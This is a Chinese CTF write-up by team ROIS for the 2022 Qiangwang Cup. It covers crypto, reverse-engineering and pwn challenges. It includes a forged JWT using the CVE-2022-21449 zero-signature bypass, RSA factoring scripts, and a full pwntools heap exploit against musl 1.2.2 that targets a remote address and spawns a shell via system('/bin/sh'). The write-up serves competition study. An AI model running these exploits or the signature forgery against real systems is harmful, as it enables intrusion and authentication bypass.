强网杯2022 Writeup

强网杯writeup by ROIS

misc

签到

签到

问卷

问卷

crypto

myJWT

CVE-2022-21449

eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxNjU5OTk5OTk5OTk5fQ==.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Factor

from Crypto.Util.number import long_to_bytes


def transform(x, y):
    res = []
    while y:
        res.append(x // y)
        x, y = y, x % y
    return res


def continued_fraction(sub_res):
    numerator, denominator = 1, 0
    for i in sub_res[::-1]:
        denominator, numerator = numerator, i * numerator + denominator
    return denominator, numerator


def sub_fraction(x, y):
    res = transform(x, y)
    res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res)))))
    return res


def wienerAttack(n1, n2):
    for (q2, q1) in sub_fraction(n1, n2):
        if q1 == 0:
            continue
        if n1 % q1 == 0 and q1 != 1:
            return (q1, q2)


# challenge 1
r = 2
n11 = 801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637
n12 = 635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371
e11=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865
e12=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881
c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579
c12=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665

q1, q2 = wienerAttack(n11, n12)
p1, p2 = sqrt(n11 // q1), sqrt(n12 // q2)
assert n11 == (p1**r) * q1
assert n12 == (p2**r) * q2
phi1 = (p1**(r - 1)) * (p1 - 1) * (q1 - 1)
phi2 = (p2**(r - 1)) * (p2 - 1) * (q2 - 1)
d1 = inverse_mod(e11, phi1)
d2 = inverse_mod(e12, phi2)
m1 = pow(c11, d1, n11)
m2 = pow(c12, d2, n12)
assert c11 == pow(m1, e11, n11)
assert c12 == pow(m2, e12, n12)


# challenge 2
r = 7
n2 = 209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209
e1 = ZZ(m1)
e2 = ZZ(m2)
c2 = 18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653
PR.<x> = PolynomialRing(Zmod(n2))
f = e1*e2*x-(e2-e1)
f = f.monic()
# k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0]
k = 3549384841973213309621072870106254602253656209014197632823411827739864720839737811030401306800875843661955913236834617545674409639259372934721570288281471569069146201536309734296340629562207991295283896
g = gcd(e1*e2*k-(e2-e1), n2)
p = g^(1/(r-1))
q = n2 // (p^7)
assert n2 == (p**r)*q
phi = (p**(r-1))*(p-1)*(q-1)
e2 = 0x10001
d2 = inverse_mod(e2, phi)
b = pow(c2, d2, n2)
assert c2 == pow(b, e2, n2)


# challenge 3
r = 7
n3 = 539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
e3 = 8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145
c3 = 113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763
b = ZZ(b)
PR.<a> = PolynomialRing(Zmod(n3))
f = e3*a - b
f = f.monic()
# k = f.small_roots(X=2^700, beta=0.75, epsilon=0.05)[0]
k = 16731588253866128571163910758846497670928988943944436618514118121761227689113110943465936457030051710610254169629932203082368465978112219532158626669990117160986135699541953274434781877420432743573801621
g = gcd(e3*k - b, n3)
p = g^(1/(r-1))
q = n3 // (p^7)
assert n3 == (p**r)*q
phi = (p**(r-1))*(p-1)*(q-1)
d3 = inverse_mod(e3, phi)
flag = pow(c3, d3, n3)
print(long_to_bytes(int(flag)))

reverse

easyapk

加密函数在sub_554,这一坨:

delta = v173;
  while ( 1 )
  {
    v145 = v179;
    *v141 = v143;
    if ( v143 >= *v145 )
      break;
    count = 0;
    v147 = *v180;
    *v183 = *v180 + v143;
    *v182 = v184;
    *v142 = *(_DWORD *)(v147 + v143);
    *v107 = *(_DWORD *)(v147 + v143 + 4);
    *v103 = 0;
    v148 = time(0);
    v149 = v174;
    v150 = v175;
    v151 = v176;
    v152 = (v148 & 0x30000000) - (v148 & 0xC0000000) + 2 * (v148 & 0x40000000) + 0x35970C13;
    v142 = v177;
    *(_DWORD *)delta = (v152 ^ 0xF4170810 | 0x1C88647) + 2 * (v152 ^ 0xBA075AA);
    key = *v182;
    v199 = **v182;
    *v151 = key[1];
    *v149 = key[2];
    *v150 = key[3];
    while ( 1 )
    {
      *v122 = count;
      if ( count > 0x1F )
        break;
      v154 = *v107;
      v155 = 2 * (*v103 | *(_DWORD *)delta) - (*(_DWORD *)delta ^ *v103);
      *v103 = v155;
      v156 = (2 * (v155 | v154) - (v155 ^ v154)) ^ (2 * (v199 | (16 * v154)) - (v199 ^ (16 * v154))) ^ (2 * (*v151 | (v154 >> 5)) - (*v151 ^ (v154 >> 5)));
      v157 = *v149;
      v158 = 2 * (v156 | *v142) - (v156 ^ *v142);
      *v142 = v158;
      v159 = (2 * (*v150 | (v158 >> 5)) - (*v150 ^ (v158 >> 5))) ^ (2 * (v157 | (16 * v158)) - (v157 ^ (16 * v158))) ^ (2 * (v158 | *v103) - (*v103 ^ v158));
      *v107 = 2 * (v159 | *v107) - (v159 ^ *v107);
      count = (*v122 | 0xFFFFFFFE) - (*v122 & 0xFFFFFFFE) + 2 * (*v122 | 1) + 1;
    }
    v141 = v178;
    v160 = (_DWORD *)*v183;
    *v160 = *v142;
    v160[1] = *v107;
    v143 = (*v141 | 0xFFFFFFF7) - (*v141 & 0xFFFFFFF7) + 2 * (*v141 | 8) + 1;
  }

鉴定为标准的tea加密,密钥是”01234567890abcdef”

最后要比对的加密数据在0x3E78, 抠下来解密,最后还要打个表转换一下:

解密:

“`cpp=
#include <stdio.h>
#include <stdint.h>

uint32_t enc_data[] = {0x5D94AA84, 0x14FA24A0, 0x2B560210, 0xB69BDD49, 0xAAEFEAD4,0x4B8CF4C6, 0x97FB8C9, 0xB5EC51D2};

char table1[] = "abcdefghijklmnopqrstuvwxyz";
char table2[] = "nopqrstuvwxyzabcdefghijklm";

void encrypt (uint32_t *v,uint32_t *k ){
uint32_t v0=v[0],v1=v[1],sum=0,i;
uint32_t delta=0x9e3779b9;
uint32_t k0=k[0],k1=k[1],k2=k[2],k3=k[3];
for(i=0;i<32;i++){
sum+=delta;
v0+=((v1<<4)+k0)^(v1+sum)^((v1>>5)+k1);
v1+=((v0<<4)+k2)^(v0+sum)^((v0>>5)+k3);
}
v[0]=v0;v[1]=v1;
}
void decrypt (uint32_t *v,uint32_t *k){
uint32_t v0=v[0],v1=v[1],sum=0xC6EF3720,i;<br />
uint32_t delta=0x9e3779b9;
uint32_t k0=k[0],k1=k[1],k2=k[2],k3=k[3];
for (i=0;i<32;i++){
v1-=((v0<<4)+k2)^(v0+sum)^((v0>>5)+k3);
v0-=((v1<<4)+k0)^(v1+sum)^((v1>>5)+k1);
sum-=delta;
}
v[0]=v0;v[1]=v1;
}

int main()
{
uint32_t k[4]={0x33323130,0x37363534,0x62613938,0x66656463};
for(int i = 0;i < 8;i+=2){
decrypt(&enc_data[i],k);
printf("%c%c%c%c%c%c%c%c",enc_data[i]&0xff,(enc_data[i]>>8)&0xff,(enc_data[i]>>16)&0xff,(enc_data[i]>>24)&0xff
,enc_data[i+1]&0xff,(enc_data[i+1]>>8)&0xff,(enc_data[i+1]>>16)&0xff,(enc_data[i+1]>>24)&0xff);
}
puts("");

<pre><code>return 0;
</code></pre>

}
// synt{Vg_Vf_A0g_guNg_zHpu_unEqre}

<pre><code class="line-numbers">打表转换:
“`python=
table1 = “abcdefghijklmnopqrstuvwxyz”
table2 = “nopqrstuvwxyzabcdefghijklm”
table1_uppper = table1.upper()
table2_uppper = table2.upper()
flag = ‘synt{Vg_Vf_A0g_guNg_zHpu_unEqre}’

res = ”

for i in flag:
idx1 = table2.find(i)
idx2 = table2_uppper.find(i)
if idx1 != -1:
res += table1[idx1]
elif idx2 != -1:
res += table1_uppper[idx2]
else:
res += i

print(res)

GameMaster

使用dnspy调试 ,在console.exe 中的goldFunc中找到获取输入作弊码的相关代码,通过patch flag 来改变运行流程,执行到 binaryFormatter.Deserialize(serializationStream); 获取反序列化dll

最后是关键验证函数:

“`c=
private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream)
{
int num = -1;
for (int i = 0; i < 320; i++)
{
x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1UL) | x << 1);
y = (((y >> 30 ^ y >> 27) & 1UL) | y << 1);
z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1UL) | z << 1);
bool flag = i % 8 == 0;
if (flag)
{
num++;
}
KeyStream[num] = (byte)((long)((long)KeyStream[num] << 1) | (long)((ulong)((uint)((z >> 32 & 1UL & (x >> 30 & 1UL)) ^ (((z >> 32 & 1UL) ^ 1UL) & (y >> 31 & 1UL))))));
}
}

<pre><code class="line-numbers">使用z3来解决,python 脚本:

“`python=
from numpy import array
from z3 import *

def get_b(data,n):
bin_str=[‘0’]*(8-len(list(bin(data)[2:])))+list(bin(data)[2:])
print(bin_str)
return int(bin_str[n])

#计算x,y,z
def get_xyz():

s = Solver()
x =BitVec(‘x’,64)
y =BitVec(‘y’,64)
z =BitVec(‘z’,64)

first=[101,5,80,213,163,26,59,38,19,6,173,189,198,166,140,183,42,247,223,24,106,20,145,37,24,7,22,191,110,179,227,5,62,9,13,17,65,22,37,5]
# for i in range(len(first)):
# data=first[::-1][i]
# data_arr=[‘0’]*(8-len(list(bin(data)[2:])))+list(bin(data)[2:])
# print(data_arr)

num=-1
for j in range(320):
x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1) | x << 1)
y = (((y >> 30 ^ y >> 27) & 1) | y << 1)
z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1) | z << 1)
if(j % 8 == 0):
num=num+1
print(num)
tmp=get_b(first[num],j%8)
s.add(tmp==((z >> 32 & 1 & (x >> 30 & 1)) ^ (((z >> 32 & 1) ^ 1) & (y >> 31 & 1))))

print(s.check())
m = s.model()
print(str(m))
#[y = 868387187, x = 156324965, z = 3131229747]
def get_key(array):
key=[]
for i in range(3):
for j in range(4):
key.append(array[i]>>j*8 &0xff)
return key

array0=[156324965,868387187,3131229747]
key=get_key(array0)
array5=[60,100,36,86,51,251,167,108,116,245,207,223,40,103,34,62,22,251,227]
flag=””
for i in range(len(array5)):
array5[i]= array5[i]^ key[i%len(key)]
flag+=chr(array5[i])
print(array5)
print(flag)
print(“flag{“+flag+”}”)

pwn

usermanager

musl 1.2.2题目,insert 替换的时候,对于全局变量的指针,没有进行更新,导致了uaf,泄露heapaddress。而且,tail删除后,依旧作为链表的tail,导致了重复的使用。musl常规思路,伪造meta,group,area,修改io,exit执行system,

“`python=
from pwn import *
libc = ELF("./libc.so")
#r=process(['./libc.so',"./UserManager"])
r=remote('59.110.212.61',23467)
elf = ELF("./UserManager")
#context.log_level = 'debug'
def ch(i):
r.sendlineafter(": ",str(i))

def add(id,size,name):
ch(1)
r.sendlineafter("Id:",str(id))
r.sendlineafter("length:",str(size))
r.sendlineafter("UserName:",name)

def check(id):
ch(2)
r.sendlineafter("Id:",str(id))

def free(id):
ch(3)
r.sendlineafter("Id:",str(id))

def clear():
ch(4)

add(0,0×38,b'0'*8)

add(1,0×38,b'1'<em>8)
add(2,0×38,b'2'</em>8)

add(2,0×38,b'T'<em>8)
add(3,0×10,b'x'</em>8)
check(2)
r.recvuntil(p64(0xdeadbeef))
heap_address = u64(r.recv(8))

print("heap_address: " ,hex(heap_address))
libc_base = heap_address-0x0b7d60
print("libc_base : ",hex(libc_base))
#system = libc_base+libc.sym['system']
system = libc_base+0x50a90
print(hex(libc.sym['system']))
stdout = libc_base+0x0b3da0
__malloc_context = 0x0b4ac0+libc_base
ofl_head = libc_base+ 0x0b6e40+8
print("__malloc_context: ",hex(__malloc_context))
print("stdout : ",hex(stdout))
print("system : ",hex(system))
print("ofl_head: ",hex(ofl_head))

add(4,0×38,p64(2)+p64(__malloc_context)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
#
check(2)
r.recv(1)
secret = u64(r.recv(8))
r.recv(0x10)
free_meta = u64(r.recv(8))
avail_meta=u64(r.recv(8))
for i in range(5):
r.recv(8)
active=list()
for i in range(64):
active.append(u64(r.recv(8)))
meta_base = active[3]

print("secret : ",secret)
print("p <em>(struct meta</em>) ",hex(meta_base))

#add(7,0×10,b'\xff'<em>8)
#add(8,0×10,b'\xff'</em>8)
free(4)
add(4,0×38,p64(2)+p64(meta_base)+p64(0x500)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
print("+++++++++++++++++++++++++++++++++++++++")
check(2)
r.recv()
for i in range(2):
print(hex(u64(r.recv(8))))
aaaaa= u64(r.recv(8))
print("a real slot address",hex(aaaaa))
free(4)

fake_chunk_address = libc_base+0x1050-0x6fe0
fakemeta_addr = fake_chunk_address-0x50

print("fake_meta_addr : ",hex(fakemeta_addr))
#fake_stdout_addr = aaaaa+0x430+0x50
fake_stdout_addr = libc_base+0xb7ac0
print("fake_stdout_addr:",hex(fake_stdout_addr))

print("fake_chunk_address ",hex(fake_chunk_address))

#add(4,0×38,p64(2)+p64(libc_base+0xb7870)+p64(0x140)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))
add(4,0×38,p64(2)+p64(libc_base+0x1050-0x6fe0)+p64(0x100)+p64(2)+p64(heap_address-0x40)+p64(heap_address-0xe0+0x60))

add(5,0×50,b'x'<em>0x8)
add(6,0×10,b'\xff'</em>8)
#context.log_level='debug'

fake_meta =b'\x00'<em>(4064)+p64(secret)+p64(0)</em>3<br />
fake_meta += p64(ofl_head-0x8)+p64(fake_stdout_addr) #fakemta1
fake_meta +=p64(fakemeta_addr+0x40)+p64(0x3fe)+p64(0xa9)+p64(0)

fake_meta +=p64(fakemeta_addr+0x1000)+p64(0x0000c00000000000)
fake_meta +=p64(fakemeta_addr)+p64(0x0000800000000009)
fake_meta +=b"AAAAAAAA"
fake_meta = fake_meta.ljust((0x2000-0x20),b'\x00')
fake_meta +=p64(secret)+p64(0)*3 #fake_area1
fake_meta += p64(0)+p64(0)+p64(fakemeta_addr+0x30)+p64(0x0)+p64(0x3c0)+p64(0) #fakemeta2

fake_stdfile =b'/bin/sh\x00'+p64(0)<em>6+p64(1)</em>2+p64(system)*2
fake_stdfile = fake_stdfile.ljust(0x50,b'\x00')
ch(1)
r.sendlineafter("Id:",str(7))
r.sendlineafter("length:",str(0x2030))
r.sendafter("UserName:",fake_meta)

#context.log_level = 'debug'

check(2)
r.recv(2)
for i in range(20):
print(hex(u64(r.recv(8))) , hex(u64(r.recv(8))))
free(2)
r.sendline("2")
r.sendlineafter("Id:",str(2))
r.sendline("1")
r.sendlineafter("Id:",str(9))
r.sendlineafter("length:",str(0x58))
r.sendafter("UserName:",fake_stdfile)

ch(5)

r.interactive()

<pre><code class="line-numbers">最大问题在于,本地搭建的环境与远程不一致,导致开始时的时候,很多数据不一致。

flag{daa69d44-7a60-4cb2-b308-95cc27b93e98}

### yakagame
调用除fight,merge等程序现有的函数之外的函数首次调用会使用map存储,第二次调用该函数时会迭代器遍历map,这个过程使用的索引v33是char类型会负数溢出进而修改cmd和score。
![](https://i.imgur.com/uuChCRu.png)
exp.c
“`c
#include <stdio.h>

char weaponlist[0x100];

int fight(int idx) {
printf(“fight\n”);
return 1;
}

void merge(int dst, int src) {
weaponlist[dst] += weaponlist[src];
}
void upgrade(char num) {
weaponlist[0] = num;
}
void newweapon(int num) {
weaponlist[0]=0;
}
void tiandongwanxiang() {
weaponlist[0]=0;
}
void newweapon0(int num) {weaponlist[0]=0;} void newweapon1(int num) {weaponlist[0]=0;} void newweapon2(int num) {weaponlist[0]=0;} void newweapon3(int num) {weaponlist[0]=0;} void newweapon4(int num) {weaponlist[0]=0;} void newweapon5(int num) {weaponlist[0]=0;} void newweapon6(int num) {weaponlist[0]=0;} void newweapon7(int num) {weaponlist[0]=0;} void newweapon8(int num) {weaponlist[0]=0;} void newweapon9(int num) {weaponlist[0]=0;} void newweapon10(int num) {weaponlist[0]=0;} void newweapon11(int num) {weaponlist[0]=0;} void newweapon12(int num) {weaponlist[0]=0;} void newweapon13(int num) {weaponlist[0]=0;} void newweapon14(int num) {weaponlist[0]=0;} void newweapon15(int num) {weaponlist[0]=0;} void newweapon16(int num) {weaponlist[0]=0;} void newweapon17(int num) {weaponlist[0]=0;} void newweapon18(int num) {weaponlist[0]=0;} void newweapon19(int num) {weaponlist[0]=0;}
void newweapon20(int num) {weaponlist[0]=0;} void newweapon21(int num) {weaponlist[0]=0;} void newweapon22(int num) {weaponlist[0]=0;} void newweapon23(int num) {weaponlist[0]=0;} void newweapon24(int num) {weaponlist[0]=0;} void newweapon25(int num) {weaponlist[0]=0;} void newweapon26(int num) {weaponlist[0]=0;} void newweapon27(int num) {weaponlist[0]=0;} void newweapon28(int num) {weaponlist[0]=0;} void newweapon29(int num) {weaponlist[0]=0;} void newweapon30(int num) {weaponlist[0]=0;} void newweapon31(int num) {weaponlist[0]=0;} void newweapon32(int num) {weaponlist[0]=0;} void newweapon33(int num) {weaponlist[0]=0;} void newweapon34(int num) {weaponlist[0]=0;} void newweapon35(int num) {weaponlist[0]=0;} void newweapon36(int num) {weaponlist[0]=0;} void newweapon37(int num) {weaponlist[0]=0;} void newweapon38(int num) {weaponlist[0]=0;} void newweapon39(int num) {weaponlist[0]=0;}
void newweapon40(int num) {weaponlist[0]=0;} void newweapon41(int num) {weaponlist[0]=0;} void newweapon42(int num) {weaponlist[0]=0;} void newweapon43(int num) {weaponlist[0]=0;} void newweapon44(int num) {weaponlist[0]=0;} void newweapon45(int num) {weaponlist[0]=0;} void newweapon46(int num) {weaponlist[0]=0;} void newweapon47(int num) {weaponlist[0]=0;} void newweapon48(int num) {weaponlist[0]=0;} void newweapon49(int num) {weaponlist[0]=0;} void newweapon50(int num) {weaponlist[0]=0;} void newweapon51(int num) {weaponlist[0]=0;} void newweapon52(int num) {weaponlist[0]=0;} void newweapon53(int num) {weaponlist[0]=0;} void newweapon54(int num) {weaponlist[0]=0;} void newweapon55(int num) {weaponlist[0]=0;} void newweapon56(int num) {weaponlist[0]=0;} void newweapon57(int num) {weaponlist[0]=0;} void newweapon58(int num) {weaponlist[0]=0;} void newweapon59(int num) {weaponlist[0]=0;}
void newweapon60(int num) {weaponlist[0]=0;} void newweapon61(int num) {weaponlist[0]=0;} void newweapon62(int num) {weaponlist[0]=0;} void newweapon63(int num) {weaponlist[0]=0;} void newweapon64(int num) {weaponlist[0]=0;} void newweapon65(int num) {weaponlist[0]=0;} void newweapon66(int num) {weaponlist[0]=0;} void newweapon67(int num) {weaponlist[0]=0;} void newweapon68(int num) {weaponlist[0]=0;} void newweapon69(int num) {weaponlist[0]=0;} void newweapon70(int num) {weaponlist[0]=0;} void newweapon71(int num) {weaponlist[0]=0;} void newweapon72(int num) {weaponlist[0]=0;} void newweapon73(int num) {weaponlist[0]=0;} void newweapon74(int num) {weaponlist[0]=0;} void newweapon75(int num) {weaponlist[0]=0;} void newweapon76(int num) {weaponlist[0]=0;} void newweapon77(int num) {weaponlist[0]=0;} void newweapon78(int num) {weaponlist[0]=0;} void newweapon79(int num) {weaponlist[0]=0;}
void newweapon80(int num) {weaponlist[0]=0;} void newweapon81(int num) {weaponlist[0]=0;} void newweapon82(int num) {weaponlist[0]=0;} void newweapon83(int num) {weaponlist[0]=0;} void newweapon84(int num) {weaponlist[0]=0;} void newweapon85(int num) {weaponlist[0]=0;} void newweapon86(int num) {weaponlist[0]=0;} void newweapon87(int num) {weaponlist[0]=0;} void newweapon88(int num) {weaponlist[0]=0;} void newweapon89(int num) {weaponlist[0]=0;} void newweapon90(int num) {weaponlist[0]=0;} void newweapon91(int num) {weaponlist[0]=0;} void newweapon92(int num) {weaponlist[0]=0;} void newweapon93(int num) {weaponlist[0]=0;} void newweapon94(int num) {weaponlist[0]=0;} void newweapon95(int num) {weaponlist[0]=0;} void newweapon96(int num) {weaponlist[0]=0;} void newweapon97(int num) {weaponlist[0]=0;} void newweapon98(int num) {weaponlist[0]=0;} void newweapon99(int num) {weaponlist[0]=0;}
void newweapon100(int num) {weaponlist[0]=0;} void newweapon101(int num) {weaponlist[0]=0;} void newweapon102(int num) {weaponlist[0]=0;} void newweapon103(int num) {weaponlist[0]=0;} void newweapon104(int num) {weaponlist[0]=0;} void newweapon105(int num) {weaponlist[0]=0;} void newweapon106(int num) {weaponlist[0]=0;} void newweapon107(int num) {weaponlist[0]=0;} void newweapon108(int num) {weaponlist[0]=0;} void newweapon109(int num) {weaponlist[0]=0;} void newweapon110(int num) {weaponlist[0]=0;} void newweapon111(int num) {weaponlist[0]=0;} void newweapon112(int num) {weaponlist[0]=0;} void newweapon113(int num) {weaponlist[0]=0;} void newweapon114(int num) {weaponlist[0]=0;} void newweapon115(int num) {weaponlist[0]=0;} void newweapon116(int num) {weaponlist[0]=0;} void newweapon117(int num) {weaponlist[0]=0;} void newweapon118(int num) {weaponlist[0]=0;} void newweapon119(int num) {weaponlist[0]=0;}
